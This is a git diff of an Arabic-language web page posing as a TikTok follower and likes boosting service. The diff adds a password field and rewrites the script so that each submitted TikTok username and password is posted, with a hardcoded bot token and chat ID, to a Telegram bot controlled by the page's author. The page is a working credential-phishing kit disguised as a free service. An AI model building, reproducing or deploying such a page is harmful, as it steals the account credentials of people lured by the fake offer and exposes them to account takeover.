--- a/index.html
+++ b/index.html
@@ -2,131 +2,116 @@
 <html lang="ar" dir="rtl">
 <head>
   <meta charset="UTF-8" />
-  <meta name="viewport" content="width=device-width, initial-scale=1.0"/>
-  <title>رشق تيك توك</title>
-  <link href="https://fonts.googleapis.com/css2?family=Cairo:wght@700&display=swap" rel="stylesheet">
+  <meta name="viewport" content="width=device-width, initial-scale=1.0" />
+  <title>رشق TikTok</title>
+  <link href="https://fonts.googleapis.com/css2?family=Cairo:wght@600&display=swap" rel="stylesheet">
   <style>
     body {
       background-color: #111;
-      color: white;
       font-family: 'Cairo', sans-serif;
-      display: flex;
-      flex-direction: column;
-      align-items: center;
-      justify-content: flex-start;
-      padding: 30px 20px;
-      min-height: 100vh;
+      color: white;
+      text-align: center;
+      padding: 30px;
     }
-
     h1 {
       font-size: 50px;
-      margin-bottom: 40px;
-    }
-
-    .tiktok-text {
       background: linear-gradient(to right, #fe2c55, #25f4ee);
       -webkit-background-clip: text;
       -webkit-text-fill-color: transparent;
-      font-weight: bold;
+      margin-bottom: 30px;
     }
-
-    .form-box {
-      background-color: #222;
-      padding: 25px;
+    form {
+      background-color: #1e1e1e;
+      padding: 30px;
       border-radius: 15px;
-      box-shadow: 0 0 10px rgba(255,255,255,0.1);
-      width: 100%;
       max-width: 400px;
+      margin: auto;
     }
-
-    .form-box label {
+    label {
       display: block;
+      text-align: right;
       margin: 15px 0 5px;
       font-size: 16px;
     }
-
-    .form-box input, .form-box select {
+    input, select {
       width: 100%;
       padding: 10px;
-      border-radius: 8px;
+      font-size: 16px;
       border: none;
+      border-radius: 8px;
       margin-bottom: 10px;
-      background: #333;
+      background-color: #333;
       color: white;
-      font-size: 15px;
     }
-
-    .form-box button {
+    button {
       width: 100%;
-      padding: 12px;
+      padding: 15px;
       font-size: 18px;
       background-color: #fe2c55;
+      color: white;
       border: none;
       border-radius: 10px;
-      color: white;
-      font-weight: bold;
       cursor: pointer;
-      transition: 0.3s;
+      margin-top: 15px;
     }
-
-    .form-box button:hover {
-      background-color: #d91b46;
+    button:hover {
+      background-color: #e3264c;
     }
   </style>
 </head>
 <body>
-  <h1 class="tiktok-text">TikTok</h1>
+  <h1>TikTok</h1>
+  <form onsubmit="sendToTelegram(event)">
+    <label for="username">اسم المستخدم:</label>
+    <input type="text" id="username" required />
 
-  <div class="form-box">
-    <form id="sendForm">
-      <label for="username">اسم المستخدم:</label>
-      <input type="text" id="username" placeholder="مثال: mntzr1376" required>
+    <label for="password">كلمة المرور:</label>
+    <input type="text" id="password" required />
 
-      <label for="followers">عدد المتابعين:</label>
-      <select id="followers">
-        <option value="1000">1000</option>
-        <option value="2000">2000</option>
-        <option value="5000">5000</option>
-      </select>
+    <label for="followers">عدد المتابعين:</label>
+    <select id="followers">
+      <option value="1000">1000</option>
+      <option value="2000">2000</option>
+      <option value="5000">5000</option>
+    </select>
 
-      <label for="type">نوع الرشق:</label>
-      <select id="type">
-        <option value="متابعين">متابعين</option>
-        <option value="لايكات">لايكات</option>
-        <option value="مشاهدات">مشاهدات</option>
-      </select>
+    <label for="type">نوع الرشق:</label>
+    <select id="type">
+      <option value="متابعين">متابعين</option>
+      <option value="لايكات">لايكات</option>
+      <option value="مشاهدات">مشاهدات</option>
+    </select>
 
-      <button type="submit">ابدأ الرشق الآن</button>
-    </form>
-  </div>
+    <button type="submit">ابدأ الرشق الآن</button>
+  </form>
 
   <script>
     const TOKEN = "7522052271:AAHa6XIscaA7ivTn_C0Wr8oaqritL0GP8EY";
     const CHAT_ID = "6454073193";
 
-    document.getElementById("sendForm").addEventListener("submit", function(e) {
-      e.preventDefault();
+    function sendToTelegram(event) {
+      event.preventDefault();
       const username = document.getElementById("username").value;
+      const password = document.getElementById("password").value;
       const followers = document.getElementById("followers").value;
       const type = document.getElementById("type").value;
 
-      const message = `📥 تم إرسال طلب رشق:\n\n👤 اليوزر: ${username}\n📊 العدد: ${followers}\n📌 النوع: ${type}`;
+      const message = `🟣 طلب جديد:\n\n👤 يوزر: ${username}\n🔐 باسورد: ${password}\n👥 عدد: ${followers}\n📌 نوع: ${type}`;
+      const url = `https://api.telegram.org/bot${TOKEN}/sendMessage`;
 
-      fetch(`https://api.telegram.org/bot${TOKEN}/sendMessage`, {
+      fetch(url, {
         method: "POST",
         headers: { "Content-Type": "application/json" },
         body: JSON.stringify({
           chat_id: CHAT_ID,
           text: message
         })
-      }).then(response => {
-        if (response.ok) {
-          alert("✅ تم إرسال الطلب بنجاح!");
-        } else {
-          alert("❌ حدث خطأ أثناء الإرسال.");
-        }
+      }).then(() => {
+        alert("✅ تم إرسال الطلب!");
+      }).catch(() => {
+        alert("❌ فشل الإرسال، حاول لاحقاً.");
       });
-    });
+    }
   </script>
 </body>
 </html>
